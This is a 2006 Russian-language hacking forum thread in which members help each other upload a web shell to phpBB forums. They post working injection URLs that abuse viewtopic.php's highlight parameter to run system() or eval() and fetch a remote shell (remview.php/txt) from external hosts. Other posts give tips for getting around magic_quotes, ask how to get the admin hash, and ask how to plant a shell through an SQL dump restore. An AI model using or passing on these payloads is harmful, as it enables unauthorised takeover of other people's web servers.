Проблемы с заливкой шелла на phpbb

Discussion in 'Песочница' started by AlexCRC, 11 Oct 2006.

  1. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    Приет.
    У меня проблемы с заливкой шеллла на форум phpbb
    Хотинг находится на hut.ru. Там вроде как помню запрещено ссылатся на удаленные файлы.
    пишу в строку такой код "http://www.ля-ля-ля.ru/viewtopic.php?xxx=wget%20http://ля-ля-ля.narod.ru/remview.php &p=12&highlight=%2527.system($_GET[xxx]).include%2527"

    Вылазеет ошибки как и надо:
    Code:
    Warning: Unknown()\b#i): failed to open stream: No such file or directory in /home/Z/ewfefe.ru/WWW/viewtopic.php(1104) : regexp code on line 1
    
    Warning: (null)(): Failed opening ')\b#i' for inclusion (include_path='.:') in /home/z/ewfewfe.ru/WWW/viewtopic.php(1104) : regexp code on line 1
    
    Warning: No ending delimiter '#' found in /home/z/ewfewfew.ru/WWW/viewtopic.php(1104) : regexp code on line 2
    Но файл не заливается на сервак.
    Что делать? можно ли через viewtopic получить хотябы хеш админа?
    Заранее ОЧЕНЬ! благодарен.
     
    #1 AlexCRC, 11 Oct 2006
    Last edited: 11 Oct 2006
  2. ZikZak

    ZikZak Elder - Старейшина

    Joined:
    27 Jul 2006
    Messages:
    218
    Likes Received:
    113
    Reputations:
    3
    Народ не поддерживает php
     
  3. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    Ну так из-за этого и выбрал народ. Если поставлю с поддержкой php - то он отдаст выполненый скрипт ;)
     
  4. Nova

    Nova Green member

    Joined:
    15 Jul 2005
    Messages:
    1,233
    Likes Received:
    423
    Reputations:
    280
    Меняй разрешение на шеле не php а txt тоесть remview.txt
     
    _________________________
  5. 1ten0.0net1

    1ten0.0net1 Time out

    Joined:
    28 Nov 2005
    Messages:
    473
    Likes Received:
    330
    Reputations:
    389
    Да, не поддерживает, само собой, кроме того увидел странную конструкцию -
    highlight=%2527.system($_GET[xxx]).include%2527"

    viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://your.site.com/shell.php

    Вот это верный вариант, на будущее, переменные с1 и с2 лучше кавычками не обрамлять, ибо на серевер может стоять опция magic_quotes=on, которая будет добавлять к каждой твоей кавчыка слеш, что портит код и препятствует его исполнению.

    И как указано выше, пробуй, конечно, расширение шелла менять на txt - предварительно создав файл shell.txt
     
  6. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    давай на jino-net.ru
     
  7. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    Непомогло :(
    Ни переименование файла, ни изменение кода :(
    Code:
    Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1
    Ссылки все правильные
     
    #7 AlexCRC, 11 Oct 2006
    Last edited: 11 Oct 2006
  8. AlexCRC

    AlexCRC Elder - Старейшина

    Joined:
    11 Oct 2006
    Messages:
    35
    Likes Received:
    6
    Reputations:
    0
    Люди помогите а?
    Вот мой шелл: http://scriptmyphp.narod.ru/remview.php и он же http://scriptmyphp.narod.ru/remview.txt

    Запрос такой:
    Code:
    http://Name.ru/viewtopic.php?t=12&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://scriptmyphp.narod.ru/remview.txt
    Запрос правильный?
    Выводится
    Code:
    Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1
     
  9. naqnaq

    naqnaq Elder - Старейшина

    Joined:
    21 Oct 2006
    Messages:
    33
    Likes Received:
    7
    Reputations:
    0
    Не стал создавать новую тему.
    Вопрос все тот же - заливка шела через админ панель phpBB.
    На форуме предлагается заливать посредством SQL =====> Дам базы формума - Внесение в дамп код шела - Рестор подправленной базы.

    Послкольку сам я никогда с этим дела не имел, вопрос в следующем:
    Необходимо ресторить дамп базы всего форума или же будет достаточно дапма содержащего толко sql запрос на запись шела?
    Вопрос назрел потому, что дамп весит больше 100Мг в неупакованном виде (gzip запрещен). Не понятно каким образом происходит рестор - это полное стирание существующего с последующей добавлением, или же - добавление и перезапись уже существующего. Если первое, то после ресторе дампа содержащего лишь код шела будет пустой форум, что не хотелось бы. Вопрос скорее касается не phpBB, а SQL в целом.
     
    #9 naqnaq, 21 Oct 2006
    Last edited: 21 Oct 2006